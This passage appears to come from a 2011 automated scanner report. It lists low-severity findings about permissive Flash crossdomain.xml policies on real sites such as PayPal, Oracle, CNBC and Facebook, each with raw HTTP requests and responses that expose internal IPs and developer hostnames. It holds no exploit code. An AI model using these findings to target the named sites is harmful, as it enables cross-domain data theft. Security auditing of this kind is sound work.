The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: assets1.csc.com
Response
HTTP/1.0 200 OK x-amz-id-2: FcnyXqPak36cLwKPUi1HA56iJfWYFNUtUM95uLnVRd/JmKoOs3CeXukpfMrEdpbc x-amz-request-id: 9A44AC709A32B889 Date: Tue, 06 Sep 2011 15:57:47 GMT Last-Modified: Thu, 03 Jun 2010 19:56:13 GMT ETag: "31616154d66e52c8a5f79d34e7fa229a" Accept-Ranges: bytes Content-Type: text/xml Content-Length: 256 Server: AmazonS3 X-Cache: Miss from cloudfront X-Amz-Cf-Id: ee9cad8e5f3b5b709b20cb0f6ea0020c8921721e47f4c95b539bdba55cfb09358c2ee8f9cae47b93,41028218a4b1860c2975b885931132835d738f7494f9734ced53465bad11a658a47fd29a3b9917d4 Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront) Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.csc.com " /> <allow-access-...[SNIP]...
4.80. http://blogs.oracle.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://blogs.oracle.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: blogs.oracle.com
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT X-Robots-Tag: noindex,follow X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html Content-Language: en Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214587153+0;age=2083326;ecid=51608497101082732,0:1) Content-Length: 392 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:12:52 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-onl...[SNIP]... <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.sun.com "/>...[SNIP]...
4.81. http://bstats.adbrite.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://bstats.adbrite.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: bstats.adbrite.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Content-Length: 398 Server: XPEHb/1.0 Accept-Ranges: none Date: Tue, 06 Sep 2011 15:32:13 GMT <?xml version="1.0" encoding="UTF-8"?> <!-- AdBrite crossdomain.xml for BritePic and BriteFlic --> <cross-domain-policy> <allow-access-from domain="*.adbrite.com " secure="true" /> <allow-access-from domain="www.adbrite.com " secure="true" />...[SNIP]... <allow-access-from domain="*.britepic.com " secure="true" />...[SNIP]... <allow-access-from domain="www.britepic.com " secure="true" />...[SNIP]...
4.82. http://channelsun.sun.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://channelsun.sun.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: channelsun.sun.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK X-Powered-By: Servlet/2.5 Server: Sun GlassFish Enterprise Server v2.1 ETag: W/"872-1302718369000" Last-Modified: Wed, 13 Apr 2011 18:12:49 GMT Content-Type: application/xml Content-Length: 872 Date: Tue, 06 Sep 2011 16:13:10 GMT <cross-domain-policy> <allow-access-from domain="*.oracle.com "/> <allow-access-from domain="oracle.com "/> <allow-access-from domain="www.oracle.com "/> <allow-access-from domain="presenter.oracle.com "/> <allow-access-from domain="streaming.oracle.com "/> <allow-access-from domain="web148.oracle.com "/> <allow-access-from domain="http://72.47.210.156 "/> <allow-access-from domain="http://216.70.88.224 "/> <allow-access-from domain="events-mktas.oracle.com "/> <allow-access-from domain="events-mktap.oracle.com "/> <allow-access-from domain="eventreg.oracle.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="admin.brightcove.com "/> <allow-access-from domain="www.oracleimg.com "/> <allow-access-from domain="medianetwork.oracle.com "/> <allow-access-from domain="*.akamai.com "/> <allow-access-from domain="*.omniture.com "/>...[SNIP]...
4.83. https://cms.paypal.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://cms.paypal.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: cms.paypal.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT Accept-Ranges: bytes Content-Length: 312 Content-Type: application/xml Expires: Tue, 06 Sep 2011 17:06:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 17:06:25 GMT Connection: close Set-Cookie: BIGipServerpool_cms.paypal.com_443=455494154.26702.0000; path=/ <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.paypal.com " /> <allow-access-from domain="*.ebay.com " /> <allow-access-from domain="*.paypalobjects.com " />...[SNIP]...
4.84. http://cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: cnbc.com Proxy-Connection: keep-alive Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_auto.swf?delay=0&config=24596694&v=7 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 31 May 2011 22:37:42 GMT Accept-Ranges: bytes ETag: "0ff4d5ae31fcc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Connection: Keep-Alive Date: Tue, 06 Sep 2011 14:57:41 GMT Age: 2384 Content-Length: 3839 <?xml version="1.0"?> <!-- http://www.msnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="nbcsports.com " /> <allow-access-from domain="nbcsports.msnbc.com " /> <allow-access-from domain="*.nbcsports.com " /> <allow-access-from domain="*.nbcsports.msnbc.com " /> <allow-access-from domain="*.msnbc.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msnbc.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbciweb " /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com " /> <allow-access-from domain="devi.ivillage.com " /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.feedburner.com "/> <allow-access-from domain="msnbc-xpress " /> <allow-access-from domain="www.cnbc.com "/> <allow-access-from domain="*.cnbc.com "/> <allow-access-from domain="widgets.nbcuni.com "/> <allow-access-from domain="*.thenbcagency.com "/> <allow-access-from domain="*.veoh.com "/> <allow-access-from domain="*.imeem.com "/> <allow-access-from domain="*.livejournal.com "/> <allow-access-from domain="*.vox.com "/> <allow-access-from domain="*.sixapart.com "/> <allow-access-from domain="*.reuters.com "/> <allow-access-from domain="*.real.com "/> <allow-access-from domain="*.akamai.net "/> <allow-access-from domain="*.atlasrichmedia.co.au "/> <allow-access-from domain="*.atlasrichmedia.co.uk "/> <allow-access-from domain="*.atlasrichmedia.com "/> <allow-access-from domain="*.atdmt.com "/> <allow-access-from domain="*.eyeblasterwiz.com "/> <allow-access-from domain="*.serving-sys.com "/> <allow-access-from domain="*.Abc.com "/> <allow-access-from domain="*.Abcnews.com "/> <allow-access-from domain="*.Accuweather.com "/> <allow-access-from domain="*.Cbs.com "/> <allow-access-from domain="*.cbsnews.com "/> <allow-access-from domain="*.discovery.com "/> <allow-access-from domain="*.ew.com "/> <allow-access-from domain="*.fox.com "/> <allow-access-from domain="*.foxnews.com "/> <allow-access-from domain="*.ign.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.tvguide.com "/> <allow-access-from domain="*.weather.com "/> <allow-access-from domain="*.vh1.com "/> <allow-access-from domain="*.usatoday.com "/> <allow-access-from domain="*.bmg.com "/> <allow-access-from domain="*.bmgmusic.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.fluid.nl "/> <allow-access-from domain="*.myspace.com "/> <allow-access-from domain="*.myspacecdn.com "/> <allow-access-from domain="*.newsvine.com "/> <allow-access-from domain="*.stamen.com " /> <allow-access-from domain="64.207.156.207 "/> <allow-access-from domain="*.msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.s-msn.com " /> <allow-access-from domain="*.telemundo.com " /> <allow-access-from domain="*.unicornmedia.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.intellitxt.com "/> <allow-access-from domain="*.panachetech.com "/> <allow-access-from domain="*.interpolls.com "/> <allow-access-from domain="*.unicornmedia.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornapp.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com " secure="false"/>...[SNIP]... <allow-access-from domain="today.com " /> <allow-access-from domain="*.today.com " /> <allow-access-from domain="*.pointroll.net " /> <allow-access-from domain="*.imwx.com " />...[SNIP]...
4.85. http://cvs.shoplocal.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://cvs.shoplocal.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: cvs.shoplocal.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 12 Aug 2011 18:31:01 GMT Accept-Ranges: bytes ETag: "7b77bcfc1d59cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" Content-Length: 5330 Date: Tue, 06 Sep 2011 17:06:25 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.crossmediaservices.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.shoplocal.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.target.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.publix.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.homedepot.com " /> <allow-access-from domain="weeklyad.lowes.com " /> <allow-access-from domain="instorespecials.staples.com " /> <allow-access-from domain="weeklyad.staples.com " /> <allow-access-from domain="weeklyad.cvs.com " /> <allow-access-from domain="weeklyad.circuitcity.com " /> <allow-access-from domain="www.jcpstoreads.com " secure="false"/>...[SNIP]... <allow-access-from domain="192.168.0.251 " /> <allow-access-from domain="10.200.1.53 " /> <allow-access-from domain="10.200.1.59 " /> <allow-access-from domain="10.200.1.61 " /> <allow-access-from domain="v-devweb1 " /> <allow-access-from domain="d-pshahrava " /> <allow-access-from domain="192.168.0.9 " /> <allow-access-from domain="192.168.0.10 " /> <allow-access-from domain="192.168.0.111 " /> <allow-access-from domain="192.168.0.36 " /> <allow-access-from domain="172.16.200.22 " /> <allow-access-from domain="172.16.200.23 " /> <allow-access-from domain="d-dmoore2 " /> <allow-access-from domain="vqascweb1 " /> <allow-access-from domain="vqascweb2 " /> <allow-access-from domain="localhost " /> <allow-access-from domain="devweb1 " secure="false"/>...[SNIP]... <allow-access-from domain="media.pointroll.com " secure="true" />...[SNIP]... <allow-access-from domain="www.pointroll.com " secure="true" />...[SNIP]... <allow-access-from domain="data.pointroll.com " secure="true" />...[SNIP]... <allow-access-from domain="speed.pointroll.com " secure="true" />...[SNIP]... <allow-access-from domain="mirror.pointroll.com " secure="true" />...[SNIP]... <allow-access-from domain="geo.pointroll.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.doubleclick.net " /> <allow-access-from domain="ad.doubleclick.net " /> <allow-access-from domain="m.doubleclick.net " /> <allow-access-from domain="m2.doubleclick.net " /> <allow-access-from domain="m3.doubleclick.net " /> <allow-access-from domain="m.2mdn.net " /> <allow-access-from domain="m1.2mdn.net " /> <allow-access-from domain="m2.2mdn.net " /> <allow-access-from domain="creatives.doubleclick.net " /> <allow-access-from domain="motifcdn2.doubleclick.net " /> <allow-access-from domain="motifcdn.doubleclick.net " /> <allow-access-from domain="*.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="dfa.doubleclick.com " secure="true" />...[SNIP]... <allow-access-from domain="*.atdmt.com " secure="true" />...[SNIP]... <allow-access-from domain="*.atlasrichmedia.com " secure="true" />...[SNIP]... <allow-access-from domain="www.ippixel.com " /> <allow-access-from domain="www.wearepixel.com " /> <allow-access-from domain="www.yourlexusdealer.com " /> <allow-access-from domain="yourlexusdealer.com " /> <allow-access-from domain="devcpd1.yourlexusdealer.com " /> <allow-access-from domain="staging.yourlexusdealer.com " /> <allow-access-from domain="*.aolcdn.com " /> <allow-access-from domain="zshalla.desktop.amazon.com " /> <allow-access-from domain="snowbank.amazon.com " /> <allow-access-from domain="weeklyad.amazon.com " /> <allow-access-from domain="d-trobertson " secure="false"/>...[SNIP]... <allow-access-from domain="vmu-shd-fb1.sf.akqa.com "/> <allow-access-from domain="tarjoukset.hs.fi " /> <allow-access-from domain="8.17.173.144 " /> <allow-access-from domain="www.targetweeklyadapps.com " /> <allow-access-from domain="*.intellitxt.com " /> <allow-access-from domain="*.richrelevance.com " /> <allow-access-from domain="devcpd2.yourlexusdealer.com " /> <allow-access-from domain="dev.big5.adhostclient.com " /> <allow-access-from domain="big5sportinggoods.com " secure="true" />...[SNIP]... <allow-access-from domain="www.big5sportinggoods.com " secure="true" />...[SNIP]... <allow-access-from domain="*.sears.com " /> <allow-access-from domain="*.kmart.com " /> <allow-access-from domain="*.facebook.com " /> <allow-access-from domain="*.designkitchen.com " /> <allow-access-from domain="*.michaels.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.bonton.com " /> <allow-access-from domain="*.elder-beerman.com " /> <allow-access-from domain="*.carsons.com " /> <allow-access-from domain="*.bostonstore.com " /> <allow-access-from domain="*.younkers.com " /> <allow-access-from domain="*.parisian.com " /> <allow-access-from domain="*.herbergers.com " /> <allow-access-from domain="*.bergners.com " /> <allow-access-from domain="flyer.canadiantire.ca " /> <allow-access-from domain="circulaire.canadiantire.ca " /> <allow-access-from domain="cdn.uc.atwola.com " /> <allow-access-from domain="*.workalicious.com " /> <allow-access-from domain="*.liquidus.net " /> <allow-access-from domain="ec2-67-202-62-111.compute-1.amazonaws.com "/> <allow-access-from domain="ec2-184-72-169-190.compute-1.amazonaws.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="69.20.118.121 " /> <allow-access-from domain="*.startribune.com " />...[SNIP]...
4.86. http://data.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://data.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: data.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:04:07 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 01 Apr 2009 19:06:33 GMT ETag: "12a-46683038a8040" Accept-Ranges: bytes Content-Type: application/xml Via: 1.1 aicache6 Content-Length: 298 X-Aicache-OS: 64.210.194.245:80 Connection: Keep-Alive Keep-Alive: max=20 <?xml version="1.0"?> <!-- http://stage.ticker.cnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " />...[SNIP]...
4.87. http://developers.facebook.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://developers.facebook.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: developers.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.136.154.104 Connection: close Content-Length: 1527 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only" /...[SNIP]... <allow-access-from domain="s-static.facebook.com " /> <allow-access-from domain="static.facebook.com " /> <allow-access-from domain="static.api.ak.facebook.com " /> <allow-access-from domain="*.static.ak.facebook.com " /> <allow-access-from domain="s-static.thefacebook.com " /> <allow-access-from domain="static.thefacebook.com " /> <allow-access-from domain="static.api.ak.thefacebook.com " /> <allow-access-from domain="*.static.ak.thefacebook.com " /> <allow-access-from domain="*.static.ak.fbcdn.com " /> <allow-access-from domain="s-static.ak.fbcdn.net " /> <allow-access-from domain="*.static.ak.fbcdn.net " /> <allow-access-from domain="s-static.ak.facebook.com " /> <allow-access-from domain="www.facebook.com " /> <allow-access-from domain="www.new.facebook.com " /> <allow-access-from domain="register.facebook.com " /> <allow-access-from domain="login.facebook.com " /> <allow-access-from domain="ssl.facebook.com " /> <allow-access-from domain="secure.facebook.com " /> <allow-access-from domain="ssl.new.facebook.com " /> <allow-access-from domain="static.ak.fbcdn.net " /> <allow-access-from domain="fvr.facebook.com " /> <allow-access-from domain="www.latest.facebook.com " /> <allow-access-from domain="www.inyour.facebook.com " /> <allow-access-from domain="www.beta.facebook.com " />...[SNIP]...
4.88. http://disqus.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://disqus.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: disqus.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:32 GMT Server: Apache Vary: Cookie,Accept-Encoding X-User: anon:608614822849 p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM" Connection: close Content-Type: text/x-cross-domain-policy <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.usopen.org " to-ports="80,96" secure="false" />...[SNIP]...
4.89. http://edge.sapient.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://edge.sapient.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: edge.sapient.com
Response
HTTP/1.0 200 OK Content-Length: 588 Content-Type: text/xml Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT Accept-Ranges: bytes ETag: "5321c4134cc4c91:1edd" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=86400 Date: Tue, 06 Sep 2011 15:32:33 GMT Connection: close ...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]> <cross-domain-policy> <allow-access-from domain="*.sapient.com " secure="false" />...[SNIP]... <allow-access-from domain="*.sapientem.com " secure="false" />...[SNIP]... <allow-access-from domain="sapient.com.edgesuite.net " secure="false" />...[SNIP]... <allow-access-from domain="edge-dev.sapient.com " secure="false" />...[SNIP]... <allow-access-from domain="localhost " secure="false" />...[SNIP]...
4.90. http://event.on24.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://event.on24.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: event.on24.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:40 GMT Server: Apache Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT Accept-Ranges: bytes Content-Length: 3138 Connection: close Content-Type: application/xml; charset=utf-8 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="i.cmpnet.com " /> <allow-access-from domain="www.ttglive.com " /> <allow-access-from domain="www.ddj.com " /> <allow-access-from domain="building.co.uk " /> <allow-access-from domain="http.earthcache.net " />...[SNIP]... <allow-access-from domain="webcast.on24.com " /> <allow-access-from domain="*.on24.com " /> <allow-access-from domain="a659.g.akamai.net " /> <allow-access-from domain="wcc.webeventservices.com " /> <allow-access-from domain="event.meetingstream.com " /> <allow-access-from domain="event.ciscowebseminars.com " /> <allow-access-from domain="webcast.premiereglobal.com " /> <allow-access-from domain="event.cisco-live.com " /> <allow-access-from domain="*.cisco.com " /> <allow-access-from domain="*.cisco-live.com " /> <allow-access-from domain="*.ciscolivevirtual.veplatform.com " /> <allow-access-from domain="*.onlineseminarsolutions.com " /> <allow-access-from domain="intelwc.on24.com " /> <allow-access-from domain="*.ogilvy.com " /> <allow-access-from domain="motifcdn2.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="motifcdn.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="ad.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m2.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m3.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m1.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m2.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m.fr.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m.se.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m.de.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="event.webcast.meetyoo.de " secure="true" />...[SNIP]... <allow-access-from domain="webcast.acrobat.com " secure="true" />...[SNIP]... <allow-access-from domain="wccqa.webeventservices.com " /> <allow-access-from domain="eventqa.meetingstream.com " /> <allow-access-from domain="eventqa.ciscowebseminars.com " /> <allow-access-from domain="webcastqa.premiereglobal.com " /> <allow-access-from domain="eventqa.webcast.meetyoo.de " secure="true" />...[SNIP]... <allow-access-from domain="webcastqa.acrobat.com " secure="true" />...[SNIP]... <allow-access-from domain="livestream.webex.com " secure="true" />...[SNIP]... <allow-access-from domain="event.vcallinteraction.com " secure="true" />...[SNIP]... <allow-access-from domain="eventqa.vcallinteraction.com " secure="true" />...[SNIP]... <allow-access-from domain="vshowqa.on24.com " secure="true" />...[SNIP]... <allow-access-from domain="*.inbfw.com "/> <allow-access-from domain="ciscovirtualevents.webex.com "/> <allow-access-from domain="vmc.lillypro.co.uk "/> <allow-access-from domain="on24.force.com " secure="true" />...[SNIP]...
4.91. https://event.on24.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://event.on24.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: event.on24.com
Response
